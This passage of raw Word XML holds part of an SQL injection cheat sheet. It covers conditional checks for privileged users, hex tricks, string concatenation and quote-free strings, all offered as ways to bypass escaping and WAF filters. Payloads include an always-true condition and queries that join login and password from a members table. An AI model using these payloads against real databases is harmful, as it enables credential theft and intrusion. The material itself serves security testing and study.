        <w:t>condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true-part</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false-part</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (L) </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SELECT iif(1&lt;2, "True", "False");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B59CE"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bookmarkStart w:id="14" w:name="SampleIfStatements"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If statement SQL injection attack samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4690FCAB"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if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (S) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>This will throw a divide by zero error if the user currently logged in is not </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dbo</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4339F4E0"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bookmarkStart w:id="15" w:name="UsingIntegers"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21741D87"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Very useful for bypassing </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>magic_quotes()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and similar filtering/escaping techniques, including web application firewall (WAF) filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D89F3" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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lastRenderedPageBreak/>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HEXNUMBER</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (SM) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC21B2C"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You can use hex values in queries like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D995667" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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CHAR(0x66)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (S) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E948B27" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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0x5045</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (M) (</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this is not an integer but a string based on the hex value...</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB39EC" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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0x50 + 0x45</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (M) (</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>... but this is now an integer!</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>You can use this technique in comparisons, for example: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' OR 0x20 + 0x10 = 0x30 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD9FC02"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bookmarkStart w:id="16" w:name="StringOperations"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A5BA6F"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String-related operations can be useful for building up injections that do not use any quotes, bypassing blacklisting, or determining the type of back-end database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEE08C6"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bookmarkStart w:id="17" w:name="StringConcat"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D33C3E" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (S) </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SELECT login + '-' + password FROM members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BAE5B9" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (*MO) </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SELECT login || '-' || password FROM members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440BC3D2"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Note that for MySQL, the above example will only work </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if MySQL is running in ANSI mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Otherwise, MySQL will treat </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> as a logical operator and return 0. A better way it to use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONCAT()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function in MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1264326C" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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CONCAT(str1, str2, str3, ...)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (M) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Concatenate supplied strings. </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SELECT CONCAT(login, password) FROM members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EF18A0"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bookmarkStart w:id="18" w:name="StringwithoutQuotes"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Strings without quotes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77907F39"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Apart from a few direct ways of specifying strings, you can always use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CHAR()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(MS) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONCAT()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(M) to generate a string without quotes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6DAA62" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String from a hex representation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732E7B64" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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0x457578</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (M): Return a string based on the hex representation </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SELECT 0x457578</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>This will be selected as a string in MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5940AD07" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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lastRenderedPageBreak/>
        <w:t>Here’s an easy trick to generate hex representations of strings in MySQL: </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SELECT CONCAT('0x',HEX('c:\\boot.ini'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213ACF92" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using string functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6839C856"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All these examples return the string </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KLM</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC78335" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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CONCAT(CHAR(75),CHAR(76),CHAR(77))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (M) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00013451" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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CHAR(75)+CHAR(76)+CHAR(77)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (S) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4940B369" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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CHR(75)||CHR(76)||CHR(77)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (O) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F8E86" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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(CHaR(75)||CHaR(76)||CHaR(77))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (P) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057B880B" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="HexbasedSamples"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
